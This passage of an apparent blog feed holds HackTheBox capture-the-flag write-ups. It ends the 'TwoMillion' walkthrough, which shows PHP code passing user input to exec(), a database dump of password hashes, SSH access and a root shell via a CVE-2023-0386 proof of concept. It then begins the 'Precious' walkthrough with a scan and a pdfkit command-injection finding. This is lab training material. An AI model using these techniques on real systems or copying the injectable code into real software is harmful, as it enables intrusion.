&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;status&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;danger&amp;#39;&lt;/span>,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#b8bb26">&amp;#39;message&amp;#39;&lt;/span> &lt;span style="color:#fe8019">=&amp;gt;&lt;/span> &lt;span style="color:#b8bb26">&amp;#39;Missing parameter: username&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> ]);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">exit&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $username &lt;span style="color:#fe8019">=&lt;/span> $json&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">username&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $this&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">regenerate_user_vpn&lt;/span>($router, $username);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $output &lt;span style="color:#fe8019">=&lt;/span> shell_exec(&lt;span style="color:#b8bb26">&amp;#34;/usr/bin/cat /var/www/html/VPN/user/&lt;/span>&lt;span style="color:#b8bb26">$username&lt;/span>&lt;span style="color:#b8bb26">.ovpn&amp;#34;&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> is_array($output) &lt;span style="color:#fe8019">?&lt;/span> implode(&lt;span style="color:#b8bb26">&amp;#34;&amp;lt;br&amp;gt;&amp;#34;&lt;/span>, $output) &lt;span style="color:#fe8019">:&lt;/span> $output;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The function is passing the &lt;code>$username&lt;/code> variable to &lt;code>regenerate_user_vpn()&lt;/code> function:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-php" data-lang="php">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">public&lt;/span> &lt;span style="color:#fe8019">function&lt;/span> &lt;span style="color:#fabd2f">regenerate_user_vpn&lt;/span>($router, $user &lt;span style="color:#fe8019">=&lt;/span> &lt;span style="color:#fe8019">null&lt;/span>) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> ($user &lt;span style="color:#fe8019">!=&lt;/span> &lt;span style="color:#fe8019">null&lt;/span>) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> exec(&lt;span style="color:#b8bb26">&amp;#34;/bin/bash /var/www/html/VPN/gen.sh &lt;/span>&lt;span style="color:#b8bb26">$user&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>, $output, $return_var);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> } &lt;span style="color:#fe8019">else&lt;/span> {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> (&lt;span style="color:#fe8019">!&lt;/span>isset($_SESSION[&lt;span style="color:#b8bb26">&amp;#39;loggedin&amp;#39;&lt;/span>]) &lt;span style="color:#fe8019">||&lt;/span> $_SESSION[&lt;span style="color:#b8bb26">&amp;#39;loggedin&amp;#39;&lt;/span>] &lt;span style="color:#fe8019">!==&lt;/span> &lt;span style="color:#fe8019">true&lt;/span>) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> header(&lt;span style="color:#b8bb26">&amp;#34;HTTP/1.1 401 Unauthorized&amp;#34;&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">exit&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">if&lt;/span> (&lt;span style="color:#fe8019">!&lt;/span>isset($_SESSION[&lt;span style="color:#b8bb26">&amp;#39;username&amp;#39;&lt;/span>]) &lt;span style="color:#fe8019">||&lt;/span> $_SESSION[&lt;span style="color:#b8bb26">&amp;#39;username&amp;#39;&lt;/span>] &lt;span style="color:#fe8019">==&lt;/span> &lt;span style="color:#fe8019">null&lt;/span>) {
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">return&lt;/span> header(&lt;span style="color:#b8bb26">&amp;#34;HTTP/1.1 401 Unauthorized&amp;#34;&lt;/span>);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">exit&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $username &lt;span style="color:#fe8019">=&lt;/span> $this&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">remove_special_chars&lt;/span>($_SESSION[&lt;span style="color:#b8bb26">&amp;#39;username&amp;#39;&lt;/span>]);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $fileName &lt;span style="color:#fe8019">=&lt;/span> $username&lt;span style="color:#fe8019">.&lt;/span> &lt;span style="color:#b8bb26">&amp;#34;.ovpn&amp;#34;&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> exec(&lt;span style="color:#b8bb26">&amp;#34;/bin/bash /var/www/html/VPN/gen.sh &lt;/span>&lt;span style="color:#b8bb26">$username&lt;/span>&lt;span style="color:#b8bb26">&amp;#34;&lt;/span>, $output, $return_var);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> $this&lt;span style="color:#fe8019">-&amp;gt;&lt;/span>&lt;span style="color:#b8bb26;font-weight:bold">download_vpn&lt;/span>($fileName);
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> }
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The function is using &lt;code>exec()&lt;/code> function to generate the vpn file if simply &lt;code>$user&lt;/code> is not &lt;code>null&lt;/code>. Great.&lt;/p>
&lt;p>Anyway&amp;hellip; let&amp;rsquo;s move on to the next step.&lt;/p>
&lt;h2 id="lateral-movement-vector">Lateral Movement vector&lt;/h2>
&lt;p>First let&amp;rsquo;s login to mysql.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/mysql-login.webp" alt="">&lt;p>There are two tables - &lt;code>invite_codes&lt;/code> and &lt;code>users&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-mysql" data-lang="mysql">&lt;span style="display:flex;">&lt;span>MariaDB [htb_prod]&lt;span style="color:#fe8019">&amp;gt;&lt;/span> &lt;span style="color:#fe8019">show&lt;/span> &lt;span style="color:#fe8019">tables&lt;/span>;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">+--------------------+&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">|&lt;/span> Tables_in_htb_prod &lt;span style="color:#fe8019">|&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">+--------------------+&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">|&lt;/span> invite_codes &lt;span style="color:#fe8019">|&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">|&lt;/span> users &lt;span style="color:#fe8019">|&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">+--------------------+&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">2&lt;/span> rows &lt;span style="color:#fe8019">in&lt;/span> &lt;span style="color:#fabd2f">set&lt;/span> (&lt;span style="color:#d3869b">0&lt;/span>.&lt;span style="color:#d3869b">000&lt;/span> sec)
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/two-million/mysql-tables.webp" alt="">&lt;p>&lt;code>invite_codes&lt;/code> probably contain the codes for the invite challenge. We could find usernames and credentials of the accounts created in the &lt;code>users&lt;/code> table:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-mysql" data-lang="mysql">&lt;span style="display:flex;">&lt;span>MariaDB [htb_prod]&lt;span style="color:#fe8019">&amp;gt;&lt;/span> &lt;span style="color:#fe8019">select&lt;/span> &lt;span style="color:#fe8019">*&lt;/span> &lt;span style="color:#fe8019">from&lt;/span> users;
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">+----+--------------+----------------------------+--------------------------------------------------------------+----------+&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">|&lt;/span> id &lt;span style="color:#fe8019">|&lt;/span> username &lt;span style="color:#fe8019">|&lt;/span> email &lt;span style="color:#fe8019">|&lt;/span> password &lt;span style="color:#fe8019">|&lt;/span> is_admin &lt;span style="color:#fe8019">|&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">+----+--------------+----------------------------+--------------------------------------------------------------+----------+&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">|&lt;/span> &lt;span style="color:#d3869b">11&lt;/span> &lt;span style="color:#fe8019">|&lt;/span> TRX &lt;span style="color:#fe8019">|&lt;/span> trx&lt;span style="color:#fe8019">@&lt;/span>hackthebox.eu &lt;span style="color:#fe8019">|&lt;/span> $&lt;span style="color:#d3869b">2&lt;/span>y$&lt;span style="color:#d3869b">10&lt;/span>$TG6oZ3ow5UZhLlw7MDME5um7j&lt;span style="color:#fe8019">/&lt;/span>&lt;span style="color:#d3869b">7&lt;/span>Cw1o6BhY8RhHMnrr2ObU3loEMq &lt;span style="color:#fe8019">|&lt;/span> &lt;span style="color:#d3869b">1&lt;/span> &lt;span style="color:#fe8019">|&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">|&lt;/span> &lt;span style="color:#d3869b">12&lt;/span> &lt;span style="color:#fe8019">|&lt;/span> TheCyberGeek &lt;span style="color:#fe8019">|&lt;/span> thecybergeek&lt;span style="color:#fe8019">@&lt;/span>hackthebox.eu &lt;span style="color:#fe8019">|&lt;/span> $&lt;span style="color:#d3869b">2&lt;/span>y$&lt;span style="color:#d3869b">10&lt;/span>$wATidKUukcOeJRaBpYtOyekSpwkKghaNYr5pjsomZUKAd0wbzw4QK &lt;span style="color:#fe8019">|&lt;/span> &lt;span style="color:#d3869b">1&lt;/span> &lt;span style="color:#fe8019">|&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">|&lt;/span> &lt;span style="color:#d3869b">13&lt;/span> &lt;span style="color:#fe8019">|&lt;/span> admin &lt;span style="color:#fe8019">|&lt;/span> admin&lt;span style="color:#fe8019">@&lt;/span>admin.com &lt;span style="color:#fe8019">|&lt;/span> $&lt;span style="color:#d3869b">2&lt;/span>y$&lt;span style="color:#d3869b">10&lt;/span>$N.hsJNfoYPGV3SGCcTYcmO5CeJ6P6mDxJS11jmAX4C&lt;span style="color:#fe8019">/&lt;/span>FZ2qzEX8Qm &lt;span style="color:#fe8019">|&lt;/span> &lt;span style="color:#d3869b">1&lt;/span> &lt;span style="color:#fe8019">|&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">|&lt;/span> &lt;span style="color:#d3869b">14&lt;/span> &lt;span style="color:#fe8019">|&lt;/span> randomuser &lt;span style="color:#fe8019">|&lt;/span> randomuser&lt;span style="color:#fe8019">@&lt;/span>&lt;span style="color:#d3869b">2&lt;/span>million.htb &lt;span style="color:#fe8019">|&lt;/span> $&lt;span style="color:#d3869b">2&lt;/span>y$&lt;span style="color:#d3869b">10&lt;/span>$MdxNNwxCAbufgaCEMsv7SeHG4yLyB551P40eAtOpqDDGJOiZHoT&lt;span style="color:#fe8019">/&lt;/span>S &lt;span style="color:#fe8019">|&lt;/span> &lt;span style="color:#d3869b">1&lt;/span> &lt;span style="color:#fe8019">|&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">+----+--------------+----------------------------+--------------------------------------------------------------+----------+&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#d3869b">4&lt;/span> rows &lt;span style="color:#fe8019">in&lt;/span> &lt;span style="color:#fabd2f">set&lt;/span> (&lt;span style="color:#d3869b">0&lt;/span>.&lt;span style="color:#d3869b">000&lt;/span> sec)
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/two-million/mysql-users.webp" alt="">&lt;p>Nothing specific.&lt;/p>
&lt;p>Let&amp;rsquo;s try ssh using the username and the password we got.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> ssh admin@10.10.11.221
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>admin@10.10.11.221s password:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>admin@2million:~$ id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>uid&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>admin&lt;span style="color:#fe8019">)&lt;/span> gid&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>admin&lt;span style="color:#fe8019">)&lt;/span> groups&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>admin&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>admin@2million:~$ whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>admin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>admin@2million:~$ cat user.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>****************************
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/two-million/ssh.webp" alt="">&lt;p>Alright we got logged in as &lt;code>admin&lt;/code> user.&lt;/p>
&lt;hr>
&lt;h1 id="privilege-escalation">Privilege Escalation&lt;/h1>
&lt;h2 id="local-enumeration-1">Local Enumeration&lt;/h2>
&lt;p>First things first:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/sudo-test.webp" alt="">&lt;p>After some enumeration found &lt;code>/var/mail/admin&lt;/code> file is readable by the admin user and may contain something interesting I mean exposition:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>admin@2million:~$ find / -type f -user admin -readable 2&amp;gt;/dev/null
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/two-million/readable-files.webp" alt="">&lt;p>As I said, not so creative but considering the burden of being an easy box it is okay&amp;hellip;&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/mail.webp" alt="">&lt;p>After searching a bit about OverlayFS kernel exploits I found this one: &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2023-0386">CVE-2023-0386&lt;/a>&lt;/p>
&lt;h2 id="privilege-escalation-vector">Privilege Escalation vector&lt;/h2>
&lt;h3 id="cve-2023-0386">CVE 2023 0386&lt;/h3>
&lt;p>Check this awesome &lt;a href="https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/">blog&lt;/a> from &lt;a href="https://securitylabs.datadoghq.com/">Datadog Security Labs&lt;/a> to know more about the exploit. We can use this &lt;a href="https://github.com/sxlmnwb/CVE-2023-0386">POC&lt;/a> to exploit the vulnerability.&lt;/p>
&lt;p>Looks like someone already did it for me and forgot to clean it up:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/poc-in-tmp.webp" alt="">&lt;p>Anyway&amp;hellip;&lt;/p>
&lt;p>We can use it to exploit and escalate into the root user:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/two-million/poc-readme.webp" alt="">&lt;p>Since the machine have &lt;code>tmux&lt;/code> already installed, we can use it to run the exploits in two seperate window:
&lt;img src="https://h4r1337.github.io/img/two-million/exploit.webp" alt="">&lt;/p>
&lt;p>And that&amp;rsquo;s it, we got the root shell!!&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>root@2million:/# whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>root
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>root@2million:/# id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>uid&lt;span style="color:#fe8019">=&lt;/span>0&lt;span style="color:#fe8019">(&lt;/span>root&lt;span style="color:#fe8019">)&lt;/span> gid&lt;span style="color:#fe8019">=&lt;/span>0&lt;span style="color:#fe8019">(&lt;/span>root&lt;span style="color:#fe8019">)&lt;/span> groups&lt;span style="color:#fe8019">=&lt;/span>0&lt;span style="color:#fe8019">(&lt;/span>root&lt;span style="color:#fe8019">)&lt;/span>,1000&lt;span style="color:#fe8019">(&lt;/span>admin&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>root@2million:/# cat /root/root.txt
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>****************************
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>root@2million:/#
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;img src="https://h4r1337.github.io/img/two-million/root.webp" alt="">&lt;hr>
&lt;p>Overall this was a fun easy box. I was able to get into the working of the api by checking the php files and it was fun. There&amp;rsquo;s also a fun easter egg kind of thing hidden inside the root directory, so if you are interested try to find it out yourself. This box also helped me to learn more about &lt;code>CVE-2023-0386&lt;/code>. Maybe I will write about the vulnerability in detail in some other blog.&lt;/p></content></item><item><title>Precious | HackTheBox</title><link>https://h4r1337.github.io/posts/precious/</link><pubDate>Sat, 03 Jun 2023 18:49:43 +0530</pubDate><guid>https://h4r1337.github.io/posts/precious/</guid><description>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/precious/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/Precious">precious&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/27582">&lt;img src="https://www.hackthebox.com/badge/image/27582" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Precious
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>In this easy machine we will exploit a critical RCE vulnerability in a PDF document generation library for ruby to gain initial access on the machine as the ruby user. And from there we will do a lateral movement to another user by using exposed plain text password. After that we will perform privilege escalation to root user by exploiting another vulnerability in a ruby function which is a deserialization RCE in &lt;code>YAML.load()&lt;/code> function.&lt;/p></description><content>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/precious/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/Precious">precious&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/27582">&lt;img src="https://www.hackthebox.com/badge/image/27582" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Precious
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>In this easy machine we will exploit a critical RCE vulnerability in a PDF document generation library for ruby to gain initial access on the machine as the ruby user. And from there we will do a lateral movement to another user by using exposed plain text password. After that we will perform privilege escalation to root user by exploiting another vulnerability in a ruby function which is a deserialization RCE in &lt;code>YAML.load()&lt;/code> function.&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;h1 id="information-gathering">Information Gathering&lt;/h1>
&lt;p>Initial script and service scan:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> nmap -sC -sV 10.10.11.189 -oA nmap/initial
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> precious.htb &lt;span style="color:#fe8019">(&lt;/span>10.10.11.189&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up &lt;span style="color:#fe8019">(&lt;/span>0.57s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: &lt;span style="color:#d3869b">998&lt;/span> closed ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 &lt;span style="color:#fe8019">(&lt;/span>protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http nginx 1.18.0
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| http-server-header:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>| nginx/1.18.0
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_ nginx/1.18.0 + Phusion Passenger&lt;span style="color:#fe8019">(&lt;/span>R&lt;span style="color:#fe8019">)&lt;/span> 6.0.15
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-title: Convert Web Page to PDF
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="port-80---http-nginx-1180">Port 80 - HTTP (Nginx 1.18.0)&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/precious/port-80.webp" alt="">&lt;p>First I thought of SSRF but there is no response when we enter a url, and it throws an error &lt;code>Cannot load remote URL!&lt;/code>. Url without http or https also throws an error &lt;code>You should provide a valid URL!&lt;/code>&lt;/p>
&lt;p>But when we append ` character at the end of a url it generates an empty pdf file.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> file k2kl1ovlfap1dqeyt0ndt0bfucqbmw0c.pdf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>k2kl1ovlfap1dqeyt0ndt0bfucqbmw0c.pdf: PDF document, version 1.4, &lt;span style="color:#d3869b">1&lt;/span> pages
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> exiftool k2kl1ovlfap1dqeyt0ndt0bfucqbmw0c.pdf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ExifTool Version Number : 12.40
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>File Name : k2kl1ovlfap1dqeyt0ndt0bfucqbmw0c.pdf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Directory : .
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>File Size : 4.5 KiB
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>File Modification Date/Time : 2023:01:19 09:11:06+05:30
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>File Access Date/Time : 2023:01:19 09:11:06+05:30
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>File Inode Change Date/Time : 2023:01:19 09:12:30+05:30
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>File Permissions : -rw-rw-r--
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>File Type : PDF
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>File Type Extension : pdf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>MIME Type : application/pdf
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PDF Version : 1.4
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Linearized : No
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Page Count : &lt;span style="color:#d3869b">1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Creator : Generated by pdfkit v0.8.6
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>After inspecting the pdf file, we can see that it is generated by &lt;code>pdfkit v0.8.6&lt;/code> and this version of &lt;code>pdfkit&lt;/code> is vulnerable to &lt;a href="https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795">command injection&lt;/a>
We can also see that &lt;code>pdfkit&lt;/code> is a package used in generating PDF documents available for ruby.&lt;/p>
&lt;h1 id="exploitation">Exploitation&lt;/h1>
&lt;h2 id="command-injection-on-pdfkit-v086-cve-2022-25675">Command Injection on &lt;code>pdfkit v0.8.6&lt;/code> (CVE-2022-25675)&lt;/h2>
&lt;blockquote>
&lt;p>An application could be vulnerable if it tries to render a URL that contains query string parameters with user input:&lt;/p>
&lt;/blockquote>
